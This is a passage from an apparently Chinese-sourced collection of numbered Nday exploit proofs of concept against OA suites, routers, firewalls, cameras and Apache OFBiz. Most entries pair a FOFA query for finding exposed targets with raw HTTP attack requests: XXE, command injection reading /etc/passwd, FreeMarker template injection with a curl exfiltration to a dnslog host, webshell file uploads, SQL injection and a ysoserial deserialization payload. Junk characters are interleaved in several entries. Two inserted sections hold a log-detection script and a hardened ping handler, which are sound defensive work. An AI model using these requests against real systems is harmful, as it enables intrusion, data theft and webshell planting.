Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. Seeyon M3-Server (致远M3-server) 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then fetch the command output:
GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普掌上校园服务管理平台service.action远程命令执行/ V& o* f" K/ S1 s, S; u
FOFA:title="掌上校园服务管理平台"" Y8 l1 m7 y! R
POST /service_transport/service.action HTTP/1.1
" Q% Q) d% A  L- ^9 y' \7 ?Host: x.x.x.x+ M8 G0 ^) s  L# K8 q! z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0# l  G7 `* A$ h$ P  L6 V
Connection: close
4 x6 @& t9 e3 k- m0 |Content-Length: 211% B1 D/ z+ K5 j' x& l  K0 v, g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ w: `+ Y9 y9 d. s/ zAccept-Encoding: gzip, deflate# I; k4 Y: W! r9 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 O2 K& \" V' T. P
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4- ~& p  @8 b1 ?: O& @, q
Upgrade-Insecure-Requests: 1
9 x) C  o; S3 ^% h) U2 l7 Y7 o" P
( J: |' G5 O, s* a4 l; L: T{1 n9 o: k, L' J% N: e2 m
"command": "GetFZinfo",4 C5 B2 b' J4 X" X. L
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
' U; A. e8 O5 ~8 _/ |3 |  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 U7 v7 C' Q: r1 J# z# V
}
* q' G  V. m' x0 H+ v7 W. B2 i4 a
' R. d  l5 V% i- R2 U
8 P% w; o- z5 i2 ^' k& gGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1( o3 Q3 o  P6 v* o
Host: x.x.x.x% T* Z' h  h/ a2 A6 X  i" w
1 J# Z0 _) r! {5 u4 r( u$ u
  b, H8 u# ~3 W! w1 d( i4 P" R

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


Then verify the file is served from the target directory:
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


4 E* _* h0 C& R( U' G8 x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& U) J9 g( h, v' E# M- Y  G7 a: M
FOFA:app="速达软件-公司产品"# X: [8 }( w% o4 W0 _
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 t  [+ _/ ~3 e0 @! b' zHost: x.x.x.x
% ~# O( ]! \0 r$ {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ~- F4 ~( r3 N; g
Content-Length: 270 J5 [* G3 Y  S, O3 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! ?+ Y! Q! W3 M8 C3 sAccept-Encoding: gzip, deflate
6 B4 W9 X/ @) YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! T6 C  q: L2 u& p2 n6 ^7 z4 J
Connection: close
- Z, C# f6 k& M8 V. aContent-Type: application/octet-stream
5 }9 K2 L1 {+ @Upgrade-Insecure-Requests: 14 m2 I3 z, L4 P2 `/ o7 f! C
0 [3 |6 c4 g9 [* ?- I8 Z
<% out.print("oessqeonylzaf");%>+ [2 u* \" k( F- M3 n+ `

* M8 S; N1 l, f9 F% b# v
' C' r" {( I% K5 k% r; `+ V" t+ XGET /xykqmfxpoas.jsp HTTP/1.10 l- ^; ?! M& X. A
Host: x.x.x.x
0 x2 e4 Q0 a5 L0 x& w0 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 G- @% ^/ I  Y- p5 |- p
Connection: close( K" L9 ?4 f/ c
Accept-Encoding: gzip. s0 ^$ s$ F3 @- M$ Y

: y$ _# _8 G( b  ~3 s8 q) u
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. Sifudi LOGBASE (思福迪LOGBASE) operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
The command to run is carried in the custom Cmd request header; PAYLOAD stands for the (elided) JSON body.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

( e/ {4 K; X) z84. Jeecg-Boot JimuReport queryFieldBySql 模板注入6 R+ O- l4 t9 V3 J% l  B  a
FOFA:title=="JeecgBoot 企业级低代码平台"
" E/ @9 F! {2 S9 b( A' e: d
9 g) O/ X/ d( H% i1 |$ J
, X  Q2 x( V. a7 C; q" `5 n1 P$ S8 P: O+ }9 V
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1( f8 T/ D+ J( H( W$ p; K
Host: 192.168.40.130:8080
+ \# a# B! ^( ]9 vUser-Agent: curl/7.88.13 j: f% f9 E7 m8 m+ u
Content-Length: 156( J# K) z- K9 n: J7 k  c
Accept: */*/ U: {# C$ F( ~0 T6 T2 y$ z
Connection: close1 q( m3 T0 p* N$ |
Content-Type: application/json
1 c# q- |$ m' n. m& VAccept-Encoding: gzip
7 v, z+ o5 v9 h4 \$ Z# D9 S  f# w4 j& g) s9 E+ N  N: d
{# l% W: T9 d! @1 U# d5 I2 O
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
1 _" p9 Q8 y* u& Q  "type": "0"
$ T% h! u3 j5 j( V; X}; R  ~8 r! n0 W; E4 S, b; c
9 n" t) p* d+ V# P5 c+ L
2 [; {- \2 J; r* J- P. e
85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is below; the body (elided as PAYLOAD) writes a Godzilla webshell. The accountId parameter is used as a directory name, so the ../ sequence lands the file under tomcat/webapps.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. DBAPPSecurity MingYu (安恒明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


Then check /jfhatuwe.php

88. DBAPPSecurity MingYu (安恒明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
The type parameter is a newline-wrapped shell command; decoded it reads: echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


Then check /txzfsrur.php (the file name written by the echo above)

89. Seeyon FE (致远互联FE) collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

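For defenders triaging web access logs against this list: the SQL injection requests in 57, 58, 64, 66, 68, 69, 71 and 89, the FreeMarker template injections in 76 and 84, and the ObjectDataProvider JSON body that opens this section share a small set of decoded-payload tokens, and several of them hide the endpoint behind path tricks (wf_printnum.jsp;.js, editflow_manager.js%70). The script below is an added example, not part of the original post or of any vendor's product: it normalizes the request path the way Tomcat does (per-segment path parameters stripped, percent-decoding applied), percent-decodes the query string or body, and reports which known endpoint and which payload token each request hits. The sample log lines are constructed here (targets copied from the PoCs above, client IPs and timestamps invented); the signature and endpoint names are my own.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Endpoints quoted in entries 57, 58, 64, 66, 68, 69, 71, 76, 83, 84 and 89
# above, lower-cased. Matched as a path suffix because deployments prepend a
# context root (e.g. /jeecg-boot).
NDAY_ENDPOINTS = (
    "/tplus/ufaqd/keyedit.aspx",
    "/tplus/ufaqd/keyinfolist.aspx",
    "/enjoyrmis_ws/ws/aps/cwsfinancecommon.asmx",
    "/defaultroot/public/iwebofficesign/template/sendfilechecktemplateedit.jsp",
    "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp",
    "/defaultroot/modules/subsidiary/contract/contract_gd.jsp",
    "/global/global_userlogin.aspx",
    "/service_transport/service.action",
    "/jmreport/testconnection",
    "/jmreport/queryfieldbysql",
    "/sysform/003/editflow_manager.jsp",
)

# Payload tokens taken from the requests above; the names are assumptions.
# Applied to the decoded, lower-cased, whitespace-collapsed query and body.
SIGNATURES = {
    "mssql-time-based": re.compile(r"waitfor\s+delay\s+'"),
    "mssql-version-probe": re.compile(r"@@version"),
    "mssql-hash-probe": re.compile(r"hashbytes\s*\(|sys\.fn_(varbintohexstr|sqlvarbasetostr)"),
    "union-select": re.compile(r"union\s+(all\s+)?select\b"),
    "freemarker-ssti": re.compile(r"<#assign\b|\?new\(\)|freemarker\.template\.utility\.execute"),
    "dotnet-objectdataprovider": re.compile(r'"__type"\s*:\s*"system\.windows\.data\.objectdataprovider'),
}

# Combined-log request field: "METHOD TARGET HTTP/x.y"
ACCESS_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize_path(raw_path: str) -> str:
    """Undo the two evasions seen above: percent-encoded path characters
    (editflow_manager.js%70 -> .jsp) and Tomcat path parameters
    (wf_printnum.jsp;.js -> wf_printnum.jsp, ..;/ -> ../) in every segment."""
    decoded = unquote_plus(raw_path)
    return "/".join(seg.split(";", 1)[0] for seg in decoded.split("/")).lower()


def decode_payload(text: str) -> str:
    """Percent-decode twice (the PoCs above encode once; double encoding is a
    common evasion), then lower-case and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(text or ""))
    return re.sub(r"\s+", " ", decoded).lower()


def scan_request(target: str, body: str = "") -> list[str]:
    """Names of every indicator that fires for one request, endpoint first."""
    path, _, query = target.partition("?")
    findings = []
    norm = normalize_path(path)
    for endpoint in NDAY_ENDPOINTS:
        if norm.endswith(endpoint):
            findings.append("nday-endpoint:" + endpoint)
            break
    haystack = decode_payload(query) + " " + decode_payload(body)
    findings.extend(name for name, rx in SIGNATURES.items() if rx.search(haystack))
    return findings


def scan_access_log(text: str) -> dict[str, list[str]]:
    """Request target -> findings for every line that fires. Access logs carry
    no body, so the SSTI and deserialization signatures only trigger when
    scan_request is fed the body from a WAF or proxy capture."""
    report = {}
    for line in text.splitlines():
        m = ACCESS_LINE.search(line)
        if m:
            hits = scan_request(m["target"])
            if hits:
                report[m["target"]] = hits
    return report


# Constructed sample (not from the original post): combined-log lines whose
# request targets are copied from the PoCs above; IPs and timestamps invented.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 321
10.0.0.5 - - [12/May/2024:10:01:07 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 18
10.0.0.7 - - [12/May/2024:10:02:30 +0800] "POST /sysform/003/editflow_manager.js%70 HTTP/1.1" 200 77
10.0.0.3 - - [12/May/2024:10:04:00 +0800] "GET /index.jsp?page=1 HTTP/1.1" 200 1024
"""
```

Two caveats when running this over real logs: the endpoint list only flags the paths quoted in this post, so a hit means "known Nday endpoint touched", not "exploited"; and the time-based payloads (entries 64, 68, 69, 71) leave no visible error, so pair the signature hit with the response time or status column of the same line when deciding whether the injection actually fired.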

: M) n  p. Q# I: W/ p- B3 K* C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
+ }- a4 @, H/ o' b/ m0 Z7 ?FOFA:icon_hash="-1830859634"- @& j) ?) S4 V" e8 w3 p; ~; r! b
POST /php/ping.php HTTP/1.1( I) g* F- k) u0 h/ N% s% |
Host: x.x.x.x9 p8 D$ d$ @$ [& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ ?# ]2 C8 {" L2 v6 j4 Q# J
Content-Length: 51
: C8 @. X' v' T$ _9 D/ g4 }Accept: application/json, text/javascript, */*; q=0.01
' k" u4 Z, [1 h, e( [* |Accept-Encoding: gzip, deflate
* p; ]: z& [& n* V( [2 h2 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! I. v6 U3 G. _5 @/ FConnection: close
2 n0 g- I+ y" S. {0 m( g; ?$ G( yContent-Type: application/x-www-form-urlencoded
8 [& e  U: l" u! r* BX-Requested-With: XMLHttpRequest
. K+ |6 V) u6 A) M" j* f
0 x1 p) `! c* ^' }7 N; rjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
' g0 z- z+ {( l" v+ y, }8 t8 G
; S$ z3 ?6 [2 \2 c4 O5 M  \+ P
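The requests in 62, 75, 79, 82, 86, 88 and 90 all abuse the same server-side mistake: a request parameter is spliced into a shell command line, so a pipe, backticks or an embedded newline run whatever follows them. The following is an added example, not code from the original post or from any of the vendors above: it puts that pattern next to a hardened ping handler that validates the target as an IP literal or host name and calls the executable without a shell. The decoded parameter values from those entries are used as constructed test inputs; the function names and the ping options are assumptions for illustration.

```python
import ipaddress
import re
import subprocess

# Constructed test inputs: the percent-decoded parameter values from entries
# 62, 75, 79, 82, 86 and 88 above, as a ping/diagnostic handler receives them.
INJECTION_SAMPLES = [
    '||echo "09kdujzKJDLinkQTLfGzMMKDJ23HJ" >09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt',  # 62
    "`ifconfig>test28256.txt`",                                                  # 75
    "|id",                                                                       # 79
    '"|id;"',                                                                    # 82
    "\ncat${IFS}/etc/passwd\n",                                                  # 86 (%0a decoded)
    "\necho '<?php phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php\n",           # 88 (decoded, shortened)
]


def ping_vulnerable(host: str) -> subprocess.CompletedProcess:
    """The pattern behind every entry above (do not use): the parameter is
    pasted into a shell command line, so a pipe, backticks or an embedded
    newline run arbitrary commands with the web server's privileges."""
    return subprocess.run("ping -c 1 " + host, shell=True, capture_output=True, text=True)


# RFC 1123 host name: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*$",
    re.IGNORECASE,
)


def validate_target(value: str) -> str:
    """Accept an IPv4/IPv6 literal or a host name, nothing else. No stripping
    or escaping: anything that is not a host is rejected outright, which also
    rules out a leading '-' that ping would otherwise parse as an option."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME.fullmatch(value):
        return value
    raise ValueError(f"not a host name or IP address: {value!r}")


def ping_argv(target: str) -> list:
    """Argument vector for the hardened handler: fixed executable and options,
    validated target last. With no shell involved, metacharacters in the
    target could only ever reach ping as one literal argument."""
    return ["ping", "-c", "1", "-W", "2", validate_target(target)]


def ping_hardened(target: str) -> subprocess.CompletedProcess:
    """Run ping without a shell; raises ValueError before exec on bad input."""
    return subprocess.run(ping_argv(target), capture_output=True, text=True, timeout=10)


def rejected(values) -> list:
    """Return the subset of `values` that validate_target refuses."""
    out = []
    for v in values:
        try:
            validate_target(v)
        except ValueError:
            out.append(v)
    return out
```

Note that a bare token such as ipconfig (entry 90's value) passes the host-name check; it is harmless as a ping argument, which is why the hardened handler also fixes the executable and its options instead of taking any part of the command line from the request.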
91. Hikvision (海康威视) integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
The ..;/ segment is a Tomcat path-parameter trick that reaches the download endpoint while the access-control filter sees a different path; the fileName parameter is then a plain ../ traversal.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. Hikvision (海康威视) operations management center (运行管理中心) session command execution
Fastjson deserialization command execution; the command to run is carried in the custom Testcmd request header.
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. QAX Wangshen (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


Then verify the upload is served from /attachements/:
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qi'anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

